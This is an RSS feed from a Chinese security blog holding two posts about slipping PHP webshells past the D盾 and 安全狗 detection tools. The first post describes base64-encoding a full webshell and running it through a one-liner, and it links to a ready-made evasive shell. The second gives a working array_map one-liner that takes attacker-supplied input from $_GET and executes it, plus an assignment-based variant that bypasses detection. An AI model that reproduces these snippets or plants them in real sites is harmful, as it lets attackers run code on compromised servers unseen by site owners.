<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>D盾 &#8211; ChaBug安全</title>
	<atom:link href="/tags/d%E7%9B%BE/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:27:49 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>PHP大马免杀思路附成品</title>
		<link>/tools/364.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 28 Feb 2018 23:17:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[D盾]]></category>
		<category><![CDATA[免杀]]></category>
		<category><![CDATA[大马]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=258</guid>

					<description><![CDATA[PHP大马免杀 0x00 介绍 前篇文章我与某狗的恩恩怨怨也介绍了一种，免杀大马的姿势，今天再介绍一种，思路来源T00ls论坛。 0x01 源码 还是一样大马源码一份，然后base...]]></description>
										<content:encoded><![CDATA[<h1>PHP<span class="wpcom_tag_link"><a href="/tags/%e5%a4%a7%e9%a9%ac" title="大马" target="_blank">大马</a></span><span class="wpcom_tag_link"><a href="/tags/%e5%85%8d%e6%9d%80" title="免杀" target="_blank">免杀</a></span></h1>
<h2>0x00 介绍</h2>
<blockquote><p>前篇文章<a href="/archives/224.html">我与某狗的恩恩怨怨</a>也介绍了一种，免杀大马的姿势，今天再介绍一种，思路来源T00ls论坛。</p></blockquote>
<h2>0x01 源码</h2>
<p>还是一样大马源码一份，然后base64加密。<br />直接上代码了。</p>
<p>本地测试<span class="wpcom_tag_link"><a href="/tags/%e8%bf%87%e7%8b%97" title="过狗" target="_blank">过狗</a></span>过<span class="wpcom_tag_link"><a href="/tags/d%e7%9b%be" title="D盾" target="_blank">D盾</a></span>，当然这是静态免杀。<br />感觉你们会觉得我不上图，不信我，那就自己动手手试试= =。</p>
<h2>0x02 思路</h2>
<p>可以看到首先base64加密，然后就像编写一句话一样，去执行我们的代码，也就是base64加密的的，思路还是可以扩展很多的，但是会waf拦截某些函数执行，就换份大马源码，但是这种方法过狗足够了。</p>
<h2>0x03 成品</h2>
<p>上传到GitHub了 <a href="https://github.com/ChaBug/shell/blob/master/php/dama_bypass.php">下载地址</a><br />另外这个大马是国外的，用不习惯的自行加密更换</p>
<p>补图：(1.php是大马)<br /><img src="/wp-content/uploads/2018/02/3600173245.jpg" alt="bypass.jpg" title="bypass.jpg"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PHP过D盾一句话</title>
		<link>/web/349.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 08 Feb 2018 11:36:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[D盾]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=136</guid>

					<description><![CDATA[日常搬砖 @X1r0z 代码 array_map() array_map() 函数将用户自定义函数作用到数组中的每个值上, 并返回用户自定义函数作用后的带有新值的数组 初始代码 a...]]></description>
										<content:encoded><![CDATA[<h2>日常搬砖 <a href="https://exp10it.cn/index.php/archives/737/">@X1r0z</a></h2>
<p><img src="/wp-content/uploads/2018/02/3311306529.jpg" alt="1517572917.jpg" title="1517572917.jpg"><br />代码</p>
<p><code>array_map()</code></p>
<blockquote><p><code>array_map() </code>函数将用户自定义函数作用到数组中的每个值上, 并返回用户自定义函数作用后的带有新值的数组</p></blockquote>
<p>初始代码</p>
<p><code>array_map($_GET['1'],$$a);</code><br /><span class="wpcom_tag_link"><a href="/tags/d%e7%9b%be" title="D盾" target="_blank">D盾</a></span> 一级</p>
<p>但 D盾 不拦截赋值语句</p>
<p><code>array_map($b=$_GET['1'],$c=$a);</code></p>
<p>绕过</p>
<p>加上 @ 关闭错误回显</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
